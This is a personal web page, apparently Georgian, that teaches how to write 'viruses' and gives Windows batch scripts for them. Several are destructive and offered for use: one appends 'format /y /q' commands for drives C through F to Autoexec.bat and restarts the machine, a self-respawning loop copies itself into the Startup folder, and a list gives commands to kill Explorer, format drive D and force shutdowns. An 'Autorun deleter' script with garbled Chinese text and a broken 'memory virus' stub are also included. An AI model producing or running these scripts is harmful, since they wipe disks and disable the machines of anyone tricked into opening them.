Personal site - my video4

rogor SevqmnaT virusebi?

aq me gaswavliT Tu rogor unda SevqmnaT virusebi, sxvadasxva tipis da sxvadasxva daniSnulebis. modi
daviwyoT. pirvel viruss romelsac me exla agixsniT akeTebs monitoris gaTiSvas ise rom monitoris
qvemod naTura anaTebs da ramdenic ar unda daaWiroT monitoris Rilaks, mainc verafers dainaxavT:
verc Desktop-s verc verafers. am virusis gasakeTeblad me damWirda: vizualurad ori fanjris Seqmna,
romelic aris Savi feris anu roca fails gaxsniT is gadaekvreba monitors da monitorze araferi Cans.
roca windows->D klaviSebs vaWerT erTmaneTis miyolebiT iciT rom eg xuravs yvela fanjaras imisaTvis
rom gamoaCinos Desktop-i, magram maT daWeris Semdeg pirveli Savi fanjara ki ixureba magram ixsneba
meore Savi fanjara romelic saSualebas ar iZleva rom desktopi gamoaCinos. amasTan erTad me gavaqre
e. w. Taskbar-i radgan programis muSaobis srulyofis mizniT es saWiroebas moiTxovda, mis gasaqrobad
me damWirda gamego Taskbar-is klasi, romelic aris: Shell_TrayWnd. amas garda me damWirda rom gameqro
kursori radgan es viruss ufro met efeqts SesZenda.

uaryofiTi mxare: virusi SegiZliaT gamorToT Task Manager-iT.

Semdegi virusia skaipis virusi. misi daniSnulebaa rom skaips Seucvalos fanjris saxeli da skaipis fanjaras
adgili ecvlebodes. am virusis Sesaqmnelad Cven dagvWirdeba rom gavigoT skaipis klasi da es klasia:
TApplication. saerTod roca gvinda rom rame programasTan kavSiri davamyaroT maSin unda gavigoT am programis
klasi. rac Seexeba fanjris adgilis cvlas, me SemoviRe cikli da drois elementi, anu me aviRe 3 wami, da am 3
wamSi fanjaram unda Seicvalos adgili.

uaryofiTi mxare: virusi SegiZliaT gamorToT Task Manager-is procesidan.

Cveni Semdegi virusi akeTebs kursoris adgilis cvlas. am virusis Sesaqmnelad me damWirda gamego kursoris
koordinatebi, amis garda gamoviyene drois elementi anu ama da am dros kursors Seecvala adglmdebareoba,
Semdeg es yvelaferi Cavsvi ciklSi. am virusis CarTvis Semdeg kusori ise swrafad icvlis adgils rom Tqven
arafris gakeTeba ar SegiZliaT.

აი ვირუსების სოურსები:
download

ვირუსები რომლებიც აქ არის დაწერილი უნდა იყოს გაკეთებული text document-ში და შემდეგ ჩასახრანებული(save as) .bat ფაილად

ეს ვირუსი ბევრ პაპკებს ქმნის

cls
md c:\aa
cls
md c:\aa2
cls
md c:\aa3
cls
md c:\aa4
cls
md c:\aa5
cls
md c:\aa6
cls
md c:\aa8
cls
md c:\aa9
cls
md c:\aa10
cls
md c:\aa11
cls
md c:\aa12
cls
md c:\aa13
cls
md c:\aa14
cls
md c:\aa15
cls
md c:\aa16
cls
md c:\aa17
cls

ეს ვირუსი საათს რევს

@ECHO OFF
cls
time 04:04
cls
cls
date 12/12/2220
cls

აქ არის მოყვანილი ვირუსის შესაქმნელად საჭირო dos-ის ბრძანებები

taskkill /f /im explorer.exe(process tishavs)
shutdown -r -t 60(arestartebs 60 camshi)
shutdown -l LOG OF(log off-s uketebs)
format /y /q d: (aformatebs anu shlis D:\ -s )
copy c:\visualhack\1.txt d:\visualhack\ (kopireba cmd-it)
md c:\aa (aa papkis shekmna)

ეს ვირუსი დაგიფორმატებთ ყველა დისკს და რესტარტს გაუკეთებს კომპს

echo format /y /q d: >> c:\Autoexec.bat
echo format /y /q e: >> c:\Autoexec.bat
echo format /y /q f: >> c:\Autoexec.bat
echo format /y /q c: >> c:\Autoexec.bat
restart -r -c

ვირუსი სახელად: cd rom

cls
Echo Set oWMP = CreateObject("WMPlayer.OCX.7") >m.vbs
Echo Set colCDROMs = oWMP.cdromCollection >>m.vbs
Echo colCDROMs.Item(i).Eject >>m.vbs
Start M.vbs
cls

ვირუსი სახელად: kill

:metka
@start kill.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka

ვირუსი სახელად: kill1

:metka
@start kill2.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka
cls
copy kill2.bat C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup
cls

ეს ვირუსი გამორთავს კომპს 60 წამში და გამოიტანს ტექსტს

shutdown -s -t 60 -c "lashatt.ucoz.com"

ვირუსი სახელად: Autorun deleter

@echo off
cls
echo.
echo *********** Delete Autorun batch file ***********
echo.
echo.
echo ¦¹ÀÉ®×°£¤F¦³§R°£Autorun.inf¨ÃÃö³¬Autorun¥\¯à¥~
echo ¥t¥~¦³§R°£MountPoints2¤º²§±`¾÷½Xªº¥\¯à
echo.
echo ==============================================
echo.
echo.
echo ¦¹§å¦¸ÀÉ°õ¦æ«á·|Ãö³¬Autorun¥\¯à
echo.
echo ¦pªGn¦^´_Autorun¥\¯à«h½Ð±NÀÉ®×©ñ¸m¦bc:\«á
echo.
echo «ö¶}©l -^> °õ¦æ -^> ¿é¤Jc:\delautorun open«á«ö½T©w
echo.
echo ¨Ì·Ó°Ê§@«ü¥Ü¶]§¹«á§Y¥i¦^´_Autorun¥\¯à
echo.
echo.
echo ¦p¤£·Q°õ¦æ½Ð«öCTRL+C«á«öY¸õ¥X©Îª½±µ±Nµøµ¡Ãö³¬¡C
echo.
pause
cls
if not "%1"=="open" goto st
echo.
echo ¦^´_Autorun¥\¯à¨Ã§R°£Autorun.inf¸ê®Æ§¨
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul
rd %%a:\autorun.inf >nul 2>nul&&echo.&&echo ²¾°£%%a:\Autorun.inf¸ê®Æ§¨
)
echo.
echo.
reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveAutoRun" /f >nul 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
echo ³B²z§¹²¦½Ð«·s¶}¾÷
echo.
pause
exit
:st
if not exist c:\delauto goto delauto
if exist c:\delauto\usbmons.dll attrib -r -s -h -a %windir%\system32\usbmons.dll&del %windir%\system32\usbmons.dll >nul 2>nul&del c:\delauto\usbmons.dll >nul 2>nul
echo.
echo ²M²z«e¦¸°õ¦æ¦¹§å¦¸ÀÉ¼È¦sÀÉ©Mautorun.inf¸ê®Æ§¨
echo.
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul
rd %%a:\autorun.inf >nul 2>nul
)
del c:\delauto\*.* /s /q >nul 2>nul
rd c:\delauto /s /q
:delauto
md c:\delauto
copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul
if not exist %windir%\system32\usbmons.dll goto disable
@echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\usbmon >>c:\delauto\fix.reg
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
attrib -r -s -h -a %windir%\system32\usbmons.dll >nul 2>nul
copy %windir%\system32\usbmons.dll c:\delauto\ >nul 2>nul
echo ½Ð©ó«·s¶}¾÷«á¦A°õ¦æ¤@¦¸¦¹µ{¦¡
echo.
pause
cls
:disable
echo.
echo ×´_ºÏºÐÂI¤£¶}©MÃö³¬autorun¥\¯à
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveAutoRun /t REG_BINARY /d ffffff03 /f >nul 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f >nul 2>nul
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if exist %%a:\autorun.inf echo.&echo §R°£%%a:\Autorun.inf
attrib -r -s -h -a %%a:\autorun.inf >nul 2>nul&del %%a:\autorun.inf /f /q >nul 2>nul
md %%a:\autorun.inf >nul 2>nul&&echo.&&echo ³Ð«Ø%%a:\Autorun.inf¸ê®Æ§¨&&attrib +r +s +h +a %%a:\autorun.inf >nul 2>nul&&echo. >>c:\delauto\autorun.txt&&fsutil fsinfo drivetype %%a: >>c:\delauto\autorun.txt&&dir/a %%a:\|find /i "autorun.inf" >> c:\delauto\autorun.txt
)
echo.
echo §R°£¸ê·½¦^¦¬±í¤º°õ¦æÀÉ
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
for %%b in (EXE COM PIF) do (
attrib -r -s -h -a %%a:\RECYCLER\*.%%b /s >nul 2>nul&attrib -r -s -h -a %%a:\RECYCLED\*.%%b /s >nul 2>nul
del %%a:\recycler\*.%%b /s /q /f >nul 2>nul&del %%a:\recycled\*.%%b /s /q /f >nul 2>nul
))

@echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >>c:\delauto\fix.reg
@echo "CheckedValue"=dword:00000001 >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe] >>c:\delauto\fix.reg
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
:last
copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
attrib -r -s -h -a c:\found.??? /S /D >nul 2>nul
del c:\found.???\*.* /s /q /f >nul 2>nul
rd c:\found.??? >nul 2>nul
echo.
echo ³B²z§¹²¦&pause
cls
echo.
echo ¥H¤U·|Åã¥Ü¦UºÏºÐ¤ºAutorun.inf¬O§_¬°¸ê®Æ§¨
echo ¦pªG¬O¦¹§å¦¸ÀÉ«Ø¥ß¤§¸ê®Æ§¨«h·|Åã¥ÜÃþ¦ü¹³¤U¦C¤å¦r
echo.
echo C: - ©T©w¦¡ºÏºÐ
echo %date% %time% ^<DIR^> autorun.inf
echo.
echo ¦pªG¨S¦³Åã¥Ü^<DIR^>³oÓ´XÓ¤å¦r«hªí¥ÜAutorun.inf§R°£¥¢±Ñ½ÐÀË¬d¹q¸£¤º¨ä¥L¦a¤è¬O§_§t¦³¯f¬r
echo ¥t¥~¦pªG¬O¥úºÐ¾÷¤ºªºÀÉ®×«h½Ð©¿²¤....
echo.
pause
echo.
type c:\delauto\autorun.txt|more
echo.
echo °õ¦æ§¹²¦½Ð«·s¶}¾÷¡C
echo.
pause
exit

ვირუსი რომელიც ბევრ dos ფანჯრებს ყრის(ანტივირუსი:taskkill /f /im cmd.exe)

start
filename.bat

ეს არის memory-ს ვირუსი

@ECHO OFF
REM <<< code: jmp installation, int_21 handler part 1 >>>
copy %0 b.com>nul
b.com
del b.com
rem <<< code: TSR installation, int_21 handler part 2 >>>

Thursday, 04.22.2010

Pages: 1

0-0 of 0 messages displayed

Free web hosting - uCoz

Support Forum

		Monday, 2025-06-23
	lasha margvelashvili